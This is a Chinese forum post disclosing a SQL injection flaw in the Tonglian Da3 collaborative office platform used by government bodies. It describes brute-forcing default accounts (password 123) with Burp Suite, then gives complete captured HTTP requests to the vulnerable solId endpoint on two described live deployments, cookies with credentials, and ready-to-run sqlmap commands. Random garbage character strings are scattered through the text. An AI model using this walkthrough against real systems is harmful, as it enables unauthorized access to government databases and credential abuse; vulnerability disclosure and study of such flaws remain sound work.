找回密码
 立即注册
查看: 2553|回复: 0
打印 上一主题 下一主题

同联Da3协同办公平台前台通用sql injection漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:15:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

- D& R2 i3 P7 W; d5 j7 v
7 A5 P. y) _% t1 Q

8 @7 b2 k: k( [" s! T

) X% Q/ S* Q$ k) ^$ J 平台简介:* W$ l# o2 V3 o& U x1 M! k* j

# H [ a! N* n& w5 w

; q! ^1 ?' O6 D s   ) l1 s' h, i& ?1 n4 r9 j8 |

) D; n# @ d. I8 F" Z$ M

$ f3 ~ ?+ W9 O' B- z) `! s 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
) u& O' r, b+ q- h 同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
( B% L0 H1 x6 P ~ v+ ` 同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献! 8 \& y$ u/ \* g; Y4 f0 S) [1 [9 K

1 g" O n6 ?+ {! L* @

6 S6 Z- O9 V; ~- @/ |- a/ [   ' e: n/ M) Z8 ^% `* C+ _7 |% S

! x. `7 j8 v$ C. n2 @% P

' ~& [7 K" D/ B- G 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: & y3 O5 O! z; t* T% ~

4 T; t: ^& j7 t* P# C

! x5 V( |- ?2 t& O4 ]  7 E# g/ ~2 \0 Q( H9 r

3 D' h! ]3 i7 y. G9 [( r7 B7 i

0 g$ v0 k* T, |& W% y http://1.1.1.1:7197/cap-aco/#(案例2-) % C. P3 T2 K# t1 X% E& i

7 W$ ^5 @- @2 C! r) [# A9 Y

. s3 L0 Z- l+ [- b http://www.XXOO.com (案例1-官网网站) ! t# V* @0 g" K3 r# e3 p( k

/ }3 W1 W8 u! \" r0 s) `

/ {: t1 Q. M4 s b8 h$ W   0 e; W3 A+ |3 z2 V" x V4 ^

/ C; E4 B' F+ [% @6 x2 C; i, z5 E

' ?7 q$ X6 ]6 U 漏洞详情: 9 V7 H* q( W$ T* R

8 T* s0 J- M6 Q9 {4 x8 X

; Y, s1 _) R+ j6 X# W* _% V  初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试. g+ W& K* C2 k

+ W7 ?" {# G0 g' ~

W; y' Z& e1 m7 W7 J h5 W      首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:/ d: R. M4 f9 ?4 S/ x

; {- [7 Q n1 s

/ u- n( i2 I* x; ~( C  2 x2 h7 Y- ?# M$ a$ x& ^; X: J

5 R, K# j5 ^* H

3 m$ N( \' R; Z( @" q1 H  : D$ A; q- Y# D3 E- \, K G

* T8 w3 T) S$ z5 J/ T0 g. J

& t$ l$ @+ F# B2 `7 ? q* J status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下: - M W9 n. M2 C2 c# b

+ _/ i, D( O, _- D$ U6 L5 C

* K5 r, c* u4 H1 s$ V 1、案例1-官方网站 $ L0 ^- o9 o# k, v

5 _& t" I0 Y' l6 [+ g/ a* E5 E' ~

% w' S7 o$ S. Z; b GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1# @0 U( q: A0 Q3 e! q

, W/ ]; s# r2 Y; q4 x

: [; K# t! l! z9 o6 P+ t Host: www.XXOO.com* k/ ]6 m5 I, w& B# f

1 |) e$ ?; x7 D3 |7 z5 L- O3 H

$ H' m, H# a9 U- `' S$ L# {' z+ J: E Proxy-Connection: Keep-Alive 0 m/ W7 y( @0 K7 b

# [) {2 w) w" b. H$ Z ?

0 Z7 P3 l' Y- l+ C5 w' f8 ~2 J Accept: application/json, text/javascript, */*; q=0.01& B# J, p8 E! A$ F. m, I+ ]

) {+ Z' n8 c% U' f' d: [

. w5 m0 Q6 K3 P3 J8 w4 O Accept-Language: zh-CN5 v: l/ h, R; }: g' q4 q1 [

# p- `9 w m0 t; W0 c4 i9 A

" v2 W( I5 f. D5 \- u: x9 ` Content-Type: application/json6 w: @ }# E" s4 A" J! f

* K5 i9 ~1 W- D9 S r6 s

! ]6 t/ B8 S* x User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko R; b' ]& s+ k9 _( K

Q* y. c+ Y7 f; X3 m1 B

* L6 t* F& n. T i2 x X-Requested-With: XMLHttpRequest! y0 F* W x8 T5 K9 c6 O1 x

# s4 ^+ {+ Q k6 o: |8 G. T# R

" H% a' Z1 t( L; n0 n Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002$ J! l/ j' U9 n \* c% p6 x

6 j4 c& R8 O+ s' N# A

- i8 j% Y* O9 f Accept-Encoding: gzip, deflate, sdch 4 G' w5 _+ Z' g9 j

2 Y q6 F% ?8 h

0 H/ n" i6 y5 n4 P5 k& ? Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e ; y1 i# U# s: J0 ~; V Q

& v$ Y7 j9 K4 k

9 @& r3 P- Z0 {2 W( }3 ]/ P 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: 6 U) w( k% b! c8 s6 q* M

8 D; e& f" }- I% \3 U

% n3 z8 b4 [3 H1 P" u0 {   . `! ?9 @5 _, Y/ u. l4 B1 [

# @; L, r" L1 a) a) P1 A% w

' |: p& ]' o& \# w! }  8 v; Y+ |+ t$ N2 M' x

$ k: c& B6 m' U8 d1 @

: s2 `" X1 n z0 a   : a$ o8 r: C( U1 X* T2 m3 D- w

6 W3 g( q" q" D1 U

B$ z% g/ ~( {- S! }- c* d2 x  $ T3 ~0 ^1 Y2 F1 S1 m! `8 U

E7 H- x1 e5 `5 @! _

# f) e/ s: U0 w( O; [3 [  2 A8 n f$ J2 S* Q

$ W& ]; W. x1 x. [4 d; n/ P

8 ~7 M6 q! m8 w" m$ y+ ^ 2、案例2-某天河云平台3 Z; D4 Y' w8 p, a) ?

: O- V0 O, C/ O9 Q& |

' h! O4 f2 X3 T7 B% f GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.15 q! i5 O* h* R- f% u2 y

; ^" X: {. m! S, Y

( [$ j) w* S- Z6 b3 K8 X8 x6 u Host: 1.1.1.:7197 - f* J; _$ o: B n

/ }. l; u. o- h+ s! \

: n3 _; N4 ?6 n1 W2 c$ l* D: P Accept: application/json, text/javascript, */*; q=0.01 G) `3 U$ e/ K0 Z2 u% {. w' Z4 `

0 g+ c& o; A0 W

6 @9 R. }# t/ T# b* w* Q8 ^ X-Requested-With: XMLHttpRequest % c! |% v+ Q6 I

" m1 w; J8 d& e

" t0 h3 F/ y7 ]# s5 t User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0 0 E4 c& B: r. M+ r: o: Q( J/ ~

9 M# Y& M( e& m& a

7 m# _; @! m& h R Content-Type: application/json ) F1 s; K- H3 R% e l4 h0 N

5 S+ I* [( ?- e7 f

- V9 D5 k6 h9 m( d* t2 x Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008, G O9 V# u, C: h- G

9 e$ \6 P0 R5 x% r# e# G, `. J6 M

# G$ M* p* e3 o4 a3 T, P Accept-Language: zh-CN,zh;q=0.8 ; }: _0 H1 n3 P# V3 S3 ^

( e2 s1 |0 H4 c W

0 p: i0 ?; _7 i Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1 0 Q; `( l6 C1 j) b/ m

/ H7 Z" P" B0 t3 o+ g

2 w3 d# g# q4 g" @+ K* N% _ Connection: close! ` ]% ?' K0 @9 I6 t' u

6 x. x' o& }0 O" o

_* V) [( A" S8 }) p5 ^ 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图: " o$ H* y$ E8 K6 n

* S- M2 w1 L. Q/ T" X& o

9 m0 `3 T( v( S( B+ t   6 H8 c7 }' M+ @3 p& t z

! B2 z* @. B2 X9 ]- F% x3 b+ r& l. Q

' C* |6 I1 b- u% p& m3 m
) o7 H4 U* ~% ` H, U

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表